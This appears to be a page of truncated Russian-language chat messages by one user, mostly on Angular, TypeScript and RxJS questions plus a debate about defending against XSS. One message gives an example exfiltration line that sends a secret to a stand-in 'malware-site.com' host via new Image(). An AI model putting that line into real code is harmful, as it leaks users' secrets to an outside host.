Mireq Fallen

всем привет можете объяснить человеку, зачем пытаться защищаться от ПОСЛЕДСТВИЙ XSS, а не от самих XSS-атак? все вокруг говорят: не храните токены в localStorage, придет злоб...

начал тут пытаться что-то сделать в рамках angular-cli появились вопросы: 1) то, что в library стили компонентов идут в JS — это я так понял, норм. Типо дальше, кто собирает ...

всем привет пытаюсь описать одну библиотеку, дошел до енамов, но тут косяк... declare namespace test { const enum A { First = 1, Second = 2, } co...

у меня тут быстрый вопрос появился... <my-component #nativeElement></my-component> <button (click)="nativeElement.getBoundingClientRect()"></button> как мне в #nativeElement ...

с другой стороны, значения енама как-то игнорятся... https://www.typescriptlang.org/play/?experimentalDecorators=true#code/JYMwBAFALgTgrgUwJRgN4CgxbAYwPYB2AzngDYIB0peA5hAOQDy...

лан, с этим вроде, разобрались... тогда... :) А как проиходит очистка ресурсов в случае с RouteReuseStrategy? мы же там храним какой-то абстрактный DetachedRouteHandle, и, к...

т.е. я хочу описать функцию как-то так: type TParam<T> = T extends Product.Bread ? BreadSorts : T extends Product.Juice ? Juices : never; function f<T, P>(prod...

вообще, я все-равно не понял, что вам нужно, но предположу: this.conditionalData$ = combineLatest( this.isData$, this.data$ ).pipe( map(([isData, data]) => { ...

arguments.callee.caller.name НО!!! никогда.... СЛЫШИШЬ? НИКОГДА ЭТОГО НЕ ДЕЛАЙ! P.S. пример: function qwe(callback) { callback(); } function rty() { console.log(argum...

я и говорю о том, что может стоит уязвимости залатать, нежели жить с уязвимостями?

есть статьи, которые можно почитать на эту тему? я пока не вижу реальной возможности осуществить XSS-атаку, а интернет захламлен банальными примерами

а если не в iif выбирать, а в concatMap()? myObsevableOfBoolean.pipe( concatMap(x => x ? firstObservable : secondObservable ) )

что-то вроде? http://jsben.ch/hsDPn

всмысле, байндить?.. если я правильно понял вашу проблему, то подписываться вы можете программно, без (onClose)="qwe" в шаблоне

а чем удобнее? falsy-значения? я бы спокойнее спал, если бы знал, что у меня может быть только одно falsy-значение — null

заменить console.log() на new Image('https://malware-site.com/collect-secrets?secret=' + encodeURICompoennt(secret))

предлагаете поставлять конечному пользователю компьютер с процессором без уязвимостей и подобранным набором ПО?

на сколько трудозатратно строить крепость из костылей и палок и на сколько трудозатратно эти палки сломать?

@juggernate а вы со своей проблемой разобрались? можно ее еще раз, а то там собирать все...